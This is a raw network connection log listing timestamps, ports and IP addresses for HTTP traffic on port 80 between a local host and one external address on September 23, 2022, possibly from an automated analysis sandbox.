Sep 23, 2022 08:13:02.098274946 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098285913 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098295927 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098303080 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098311901 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098331928 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098340988 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098360062 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098371029 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098387957 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098402023 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098411083 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098417044 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098443985 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098455906 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098469973 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098472118 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098500967 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098515034 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098526955 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098529100 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098557949 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098571062 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098584890 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098586082 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098601103 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098614931 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098643064 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098656893 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098670959 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098680019 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098699093 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098701000 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098757029 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098762035 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098789930 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098797083 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098815918 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098838091 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098844051 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098854065 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098871946 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098896980 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098900080 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098911047 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098927975 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098954916 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.098959923 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098975897 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.098983049 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099009991 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099013090 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099030018 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099037886 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099065065 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099092007 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099119902 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099133015 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099140882 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099140882 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099147081 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099154949 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099174976 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099201918 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099220037 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099230051 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099235058 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099251032 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099257946 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099286079 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099296093 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099309921 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099313974 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099325895 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099342108 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099383116 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099392891 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099420071 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099430084 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099436045 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099455118 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099720001 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099749088 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099776030 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099802017 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099823952 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099828959 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099842072 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099852085 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099858046 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099874973 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099884987 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099900961 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099911928 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099916935 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099946976 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099951029 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099971056 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.099975109 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.099992037 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100002050 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100013018 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100013971 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100033998 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100043058 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100061893 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100073099 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100099087 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100107908 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100126982 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100132942 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100152016 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100155115 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100183010 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100183964 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100205898 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100214005 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100235939 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100243092 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100255966 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100270987 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100300074 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100326061 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100342989 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100353003 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100353956 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100358963 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100383043 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100398064 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100409031 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100411892 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100431919 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100436926 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100465059 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100471973 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100486040 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100492954 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100508928 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100522041 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100548029 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100549936 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100569963 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100575924 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100594997 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100605011 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100624084 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100631952 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100655079 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.100670099 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100687027 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.100768089 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.113725901 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.113771915 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.113801956 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.113831997 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.113832951 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.113857031 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.113859892 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.113893032 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.113903999 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.113909960 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.113923073 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.113934994 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.113944054 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.113951921 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.113981009 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.113981962 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.114011049 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.114027023 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.114053011 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.114092112 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.114095926 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.114125967 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.114156008 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.114167929 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.114187002 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.114188910 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.114217043 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.114223957 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.114248037 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.114248037 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.114275932 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.114289045 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.114317894 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.114324093 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.114341974 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.114351034 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.114393950 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.114876986 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.118037939 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:05.779131889 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:07.061520100 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:07.061619043 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.786366940 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.810971022 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.811155081 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.820766926 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.845530033 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.845700026 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.845768929 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.845818043 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.845884085 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.845925093 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.845974922 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.845994949 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.846035004 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.846045971 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.846096992 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.846096039 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.846148014 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.846199036 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.846304893 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.848597050 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.870817900 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.870883942 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.870938063 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.870990992 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871047020 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871105909 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871108055 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.871141911 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.871157885 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871210098 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871232986 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.871258974 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871309042 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871334076 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.871395111 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.871395111 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871448994 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871498108 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871520042 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.871550083 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871601105 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871617079 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.871651888 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871704102 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871722937 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.871754885 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871808052 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871826887 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.871867895 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.871937037 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.872212887 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.896517038 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.896584034 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.896641016 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.896691084 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.896744967 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.896748066 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.896799088 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.896802902 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.896859884 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.896892071 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.896909952 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.896960974 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897007942 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.897011042 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897062063 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897103071 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.897116899 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897176027 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897197962 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.897229910 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897289991 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897309065 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.897345066 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897403002 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897429943 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.897454023 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897502899 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897525072 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.897552967 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897603989 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897624969 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.897655010 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897715092 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897736073 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.897773027 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897813082 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897861958 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.897866011 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897916079 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.897941113 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.897967100 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898015022 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.898015022 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898066044 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898088932 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.898116112 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898139000 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.898164988 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898216963 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898246050 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.898267031 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898328066 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898349047 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.898391962 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898452044 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898475885 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.898504019 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898560047 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898574114 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.898611069 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.898649931 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.898696899 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.923377991 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.923676968 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.923734903 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.923794031 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.923821926 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.923845053 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.923898935 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.923899889 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.923949003 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924001932 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924056053 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924058914 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.924079895 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.924105883 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924155951 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924180984 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.924206018 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924257994 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924268961 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.924309969 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924359083 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924371004 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.924408913 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924468040 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924482107 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.924530983 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924590111 CEST	80	49172	159.223.2.212	192.168.2.22
